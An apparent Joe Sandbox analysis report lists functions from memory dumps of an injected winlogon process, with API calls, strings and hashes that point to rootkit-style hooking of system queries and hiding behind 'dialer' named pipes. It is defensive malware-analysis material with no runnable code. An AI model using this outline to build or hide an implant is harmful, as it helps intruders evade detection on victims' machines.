Instruction ID: f97b769f531a54a6f9503ce92d864bf0fdaadaae578e81e34ce15da814df0fdb
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 9E61287274269287FB68CF16D48876CB791FB04B95F56801BDE1907786EB38D892CB20

Non-executed Functions

Function 000002E991752CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002E991752D80
lstrlenW.KERNEL32 ref: 000002E991752FBA

Part of subcall function 000002E991751A14: OpenProcess.KERNEL32 ref: 000002E991751A3A
Part of subcall function 000002E991751A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002E991751A58
Part of subcall function 000002E991751A14: PathFindFileNameW.SHLWAPI ref: 000002E991751A67
Part of subcall function 000002E991751A14: lstrlenW.KERNEL32 ref: 000002E991751A73
Part of subcall function 000002E991751A14: StrCpyW.SHLWAPI ref: 000002E991751A86
Part of subcall function 000002E991751A14: CloseHandle.KERNEL32 ref: 000002E991751A94

GetProcAddress.KERNEL32 ref: 000002E991752D95

Part of subcall function 000002E991751554: StrCmpIW.SHLWAPI ref: 000002E991751585

Part of subcall function 000002E991753930: StrCmpNIW.SHLWAPI ref: 000002E991753948

StrCmpNIW.SHLWAPI ref: 000002E991752DD8
lstrlenW.KERNEL32 ref: 000002E991752F00

Strings

NtQueryObject, xrefs: 000002E991752D8B
\Device\Nsi, xrefs: 000002E991752DCB
ntdll.dll, xrefs: 000002E991752D79

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 098ea08ed377d774df965bfb112f93bc795948e7bdae4f92a49af68d9e7659d5
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 2FB1BE22350AD2C2EB698F27D5487AA63A5FB44B84F56501FEE09537A6DF35CCC0CB60

Function 000002E991757E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002E991757E8C
RtlCaptureContext.NTDLL ref: 000002E991757EB9
RtlLookupFunctionEntry.NTDLL ref: 000002E991757ED3
RtlVirtualUnwind.NTDLL ref: 000002E991757F14
IsDebuggerPresent.KERNEL32 ref: 000002E991757F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002E991757F89
UnhandledExceptionFilter.KERNEL32 ref: 000002E991757F94

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 79b72996a53cbe8afecd15f437898d8dfdb403264fe82a385b16de759ba5379f
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 6F315E72344BC19AEB608F62E8447ED7360F788744F45442ADA4D47B99EF38C588CB20

Function 000002E99175B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002E99175B585
RtlLookupFunctionEntry.NTDLL ref: 000002E99175B59D
RtlVirtualUnwind.NTDLL ref: 000002E99175B5D8
IsDebuggerPresent.KERNEL32 ref: 000002E99175B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002E99175B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002E99175B626

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 7b04f8da15ebd91ecf27d723d70f24566cd981bda809e52e17ef89d9a1dc94c9
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 84319232254FC196DB60CF26E8443AE73A4F788794F51012AEA9D43B96DF38C595CF20

Function 000002E99175FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002E99175FF67
WriteFile.KERNEL32 ref: 000002E99176021E
WriteFile.KERNEL32 ref: 000002E991760270
GetLastError.KERNEL32 ref: 000002E991760372
GetLastError.KERNEL32 ref: 000002E9917603D2

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 76cff87c33ca843c4ecc309d17d9a6d63332ff18c120fdf2b1f541d030c209c1
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: FEE1F132754AC18AE700CF66D4882DE7BB1F3457C8F55411BDE4E97B9ADA38C89ACB10

Function 000002E99175BE3C Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction ID: 68dee5b66efbf2576b9e234837574920ade6715da3ddccdb4a9f474ddcf4bdf5
Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction Fuzzy Hash: E851E3227547D188F7209B77ED083AE7BA5B745BD4F16421AEEA847B96CF38C181CB10

Function 000002E9917314A0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction ID: e5bc22274be8ea3966a17ebb5f904d0e78f69c01a695bda46f1ee3afabaffa2c
Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction Fuzzy Hash: D0F062717542958AEBA48F29F94671977E0F308380F90841ED689C3B04D63C81A19F24

Function 000002E991763218 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
Instruction Fuzzy Hash:

Function 000002E9917512C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002E991751326
GetProcessHeap.KERNEL32 ref: 000002E991751334
HeapAlloc.KERNEL32 ref: 000002E991751345
RegEnumValueW.ADVAPI32 ref: 000002E9917513A1

Part of subcall function 000002E991751554: StrCmpIW.SHLWAPI ref: 000002E991751585

GetProcessHeap.KERNEL32 ref: 000002E9917513E9
HeapAlloc.KERNEL32 ref: 000002E9917513F7
GetProcessHeap.KERNEL32 ref: 000002E99175141B
HeapFree.KERNEL32 ref: 000002E991751429
lstrlenW.KERNEL32 ref: 000002E991751432
GetProcessHeap.KERNEL32 ref: 000002E991751440
HeapAlloc.KERNEL32 ref: 000002E99175144E
StrCpyW.SHLWAPI ref: 000002E991751470
GetProcessHeap.KERNEL32 ref: 000002E991751485
HeapFree.KERNEL32 ref: 000002E991751493

Strings

d, xrefs: 000002E991751365

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: aeb95de4f42054a2f3f95a2b872bf4f2243f0c658a77d544ea9ad6ad2c1c143a
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 58518D72244B89D3EB14CF63E54839AB7B1F789BC1F05812ADA4A47B15DF38C496CB20

Function 000002E991751EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002E991751EBF

Part of subcall function 000002E991752174: GetModuleHandleA.KERNEL32 ref: 000002E99175218C
Part of subcall function 000002E991752174: GetProcAddress.KERNEL32 ref: 000002E99175219D

Part of subcall function 000002E991755C10: GetCurrentThreadId.KERNEL32 ref: 000002E991755C4B

Strings

NtQueryDirectoryFileEx, xrefs: 000002E991751F3C
NtDeviceIoControlFile, xrefs: 000002E991751FF6
advapi32.dll, xrefs: 000002E991751F97, 000002E991751FB8
EnumServicesStatusExW, xrefs: 000002E991751FB1, 000002E991751FD2
NtEnumerateKey, xrefs: 000002E991751F59
NtEnumerateValueKey, xrefs: 000002E991751F76
NtResumeThread, xrefs: 000002E991751F02
ntdll.dll, xrefs: 000002E991751ECD
NtQuerySystemInformation, xrefs: 000002E991751EE5
NtQueryDirectoryFile, xrefs: 000002E991751F1F
sechost.dll, xrefs: 000002E991751FD9
EnumServiceGroupW, xrefs: 000002E991751F90

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 8cce2f1a17bd9a47a59a043041d4b8e8b5a8303ea1d5e03b2a23537e3786b7a4
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 8731C268280ACBE0EB04EF67E9596D43321B744384F87551B950992167AF388AC9CBB2

Function 000002E9917523F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002E991752405
GetCurrentProcessId.KERNEL32 ref: 000002E99175240F

Part of subcall function 000002E9917519AC: OpenProcess.KERNEL32 ref: 000002E9917519CA
Part of subcall function 000002E9917519AC: IsWow64Process.KERNEL32 ref: 000002E9917519E0
Part of subcall function 000002E9917519AC: CloseHandle.KERNEL32 ref: 000002E9917519FB

CreateFileW.KERNEL32 ref: 000002E991752468
WriteFile.KERNEL32 ref: 000002E991752490
ReadFile.KERNEL32 ref: 000002E9917524AF
CloseHandle.KERNEL32 ref: 000002E9917524B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002E99175243F
\\.\pipe\dialerchildproc64, xrefs: 000002E991752438

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 53bdd41ac6b1d8d54737249bc52a119373122e5eeb4dbf41134d301e03b5d5e4
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 9A217135754B8583FB10CB26E40835977A1F389BE4F51421ADA5D42BA9CF3CC589CF21

Function 000002E99175104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002E9917510AB
RegEnumValueW.ADVAPI32 ref: 000002E99175110E
GetProcessHeap.KERNEL32 ref: 000002E991751155
HeapAlloc.KERNEL32 ref: 000002E991751163
GetProcessHeap.KERNEL32 ref: 000002E991751187
HeapFree.KERNEL32 ref: 000002E991751195

Strings

d, xrefs: 000002E9917510CE

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 8f8b1e4e2d489b3ebf195f3dd781b4f22cd6ba0354d6cfda7ca4a4e081beaad5
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: E0418C33214BC1D7E7648F62E44839AB7A1F389B85F01812ADB8A47B59DF38C5A4CB10

Function 000002E9917869F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002E991786A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002E991786A6A
_RTC_Initialize.LIBCMT ref: 000002E991786A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002E991786ABE
__scrt_release_startup_lock.LIBCMT ref: 000002E991786AE9

Memory Dump Source

Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 286d5c8e7f6a6ca339d99bbb7d6dcee694a4070d76ebb3cc219e36735a09aa4a
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 7C81D3216C02C3A6FA54AB27D4C935966D0F785780FD640AFBA1947797DB38C9C68F30

Function 000002E9917269F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002E991726A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002E991726A6A
_RTC_Initialize.LIBCMT ref: 000002E991726A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002E991726ABE
__scrt_release_startup_lock.LIBCMT ref: 000002E991726AE9

Memory Dump Source

Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 53fcbbc3d2a3e370178729f48bdfe8c921b2a15122ac105cd4e536dc3953e0b9
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 7381A2616822C386FB60AB27E44939962A0F755780F96482FBE0543797DB38C9C78F30

Function 000002E9917575F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002E991757618
__scrt_acquire_startup_lock.LIBCMT ref: 000002E99175766A
_RTC_Initialize.LIBCMT ref: 000002E991757698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002E9917576BE
__scrt_release_startup_lock.LIBCMT ref: 000002E9917576E9

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 60312374366c341bdeb66b744369ff18c4e017edde39ec245524e073ca5c3d56
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 0D81E4207D43C7A6FB509B2BE84D3692291B745780F8A441F9A4887797DB38C8C5CF31

Function 000002E991759804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002E991759889
GetLastError.KERNEL32 ref: 000002E991759897
LoadLibraryExW.KERNEL32 ref: 000002E9917598C1
FreeLibrary.KERNEL32 ref: 000002E991759907
GetProcAddress.KERNEL32 ref: 000002E991759913

Strings

api-ms-, xrefs: 000002E9917598A9

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: d7ff3d212e4310c3368abd7f8598e6958ee0b0ec7f7d81cda9a40661fe3de822
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 4331A631392BD291FE159B03E4087A963A4B749BA0F5B052EDD2D4B386DF38D4C5CB20

Function 000002E991761B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002E991761BCD
GetLastError.KERNEL32 ref: 000002E991761BD9
CloseHandle.KERNEL32 ref: 000002E991761BF1
CreateFileW.KERNEL32 ref: 000002E991761C1C
WriteConsoleW.KERNEL32 ref: 000002E991761C3B

Strings

CONOUT$, xrefs: 000002E991761BFD

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: af28d6c988de902296c6bed468f3d3ecf701edbb6641ab2850be54f418a0f1ad
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 5F11BF21354F8186E7508B43E85C31972A1F388FE4F05022AEA5EC7796DF78C988CB61

Function 000002E9917530B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E9917530D7
HeapAlloc.KERNEL32 ref: 000002E9917530EA
StrCmpNIW.SHLWAPI ref: 000002E99175316B
GetProcessHeap.KERNEL32 ref: 000002E9917531D1
HeapFree.KERNEL32 ref: 000002E9917531DF

Strings

dialer, xrefs: 000002E991753164

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: cc620110a51a58dd70edbd7c37a0e2fb6e7be8ddb1bfead4c1becedaa8ec603b
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 5831A621741F9682EB55DF67E84866973B0FB44BC4F06402A9E4947B66EF38C8E1CB70

Function 000002E991751A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002E991751A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002E991751A58
PathFindFileNameW.SHLWAPI ref: 000002E991751A67
lstrlenW.KERNEL32 ref: 000002E991751A73
StrCpyW.SHLWAPI ref: 000002E991751A86
CloseHandle.KERNEL32 ref: 000002E991751A94

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 4d08f418929920b4e8b1735536e92d9e373c27977508908f1483ba05dee0d63d
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 4A015721340A8696EA14DB13E85835963A1F788FD1F49803ACE8E83756DF38C9C9CB60

Function 000002E9917537AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002E9917537C8
GetCurrentProcess.KERNEL32 ref: 000002E9917537D6
VirtualProtectEx.KERNEL32 ref: 000002E9917537F8
GetCurrentProcess.KERNEL32 ref: 000002E991753819
VirtualProtectEx.KERNEL32 ref: 000002E99175383A
TerminateThread.KERNEL32 ref: 000002E991753849

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: d61940c0ec6f7cf42cd69532e0be27823bb6057274f353414079f4d0b405efc5
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: D3112D65751B8686FB249B23E41D71667A1BB48B85F05042ECD4D87766EF3CC488CF31

Function 000002E9917590D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E991759103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002E991759198
RtlUnwindEx.NTDLL ref: 000002E9917591E7

Strings

f, xrefs: 000002E991759116
csm, xrefs: 000002E99175917E

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: ace2962ad30fa323b0aad9357b7a9f552d46174ff27360a27e755925f39c32bd
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 5751AE323556928AEB14CF26E44CB693795F344BD8F52812ADE1A4778AEB75CC81CB20

Function 000002E991751AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002E991751AD8
StrCmpNIW.SHLWAPI ref: 000002E991751AF2
lstrlenW.KERNEL32 ref: 000002E991751B01
StrCpyW.SHLWAPI ref: 000002E991751B16

Strings

\\?\, xrefs: 000002E991751AE6

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 17dde31f65c8a099198bc7b4df53dd6c50603f47b852e73b7a0a4bcd5db8d376
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 91F04F223446C692EB208B22F5983596761F744BD9F85802ACA4D8A956DF3DC6CCCF20

Function 000002E991753200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002E991753222
StrCpyW.SHLWAPI ref: 000002E991753232
StrCatW.SHLWAPI ref: 000002E99175323E
PathCombineW.SHLWAPI ref: 000002E99175324C

Strings

\\.\pipe\, xrefs: 000002E991753218

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 864e42a3574307904fc1d857d0a4859218df6f1e63948cc20cc97121c544bdde
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 27F08220348BC691EA008B13F9081196220BB48FD0F09813BDE5A87B2ACF3CC5C1CB21

Function 000002E99175A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002E99175A154
GetProcAddress.KERNEL32 ref: 000002E99175A16A
FreeLibrary.KERNEL32 ref: 000002E99175A187

Strings

CorExitProcess, xrefs: 000002E99175A163
mscoree.dll, xrefs: 000002E99175A14B

Memory Dump Source

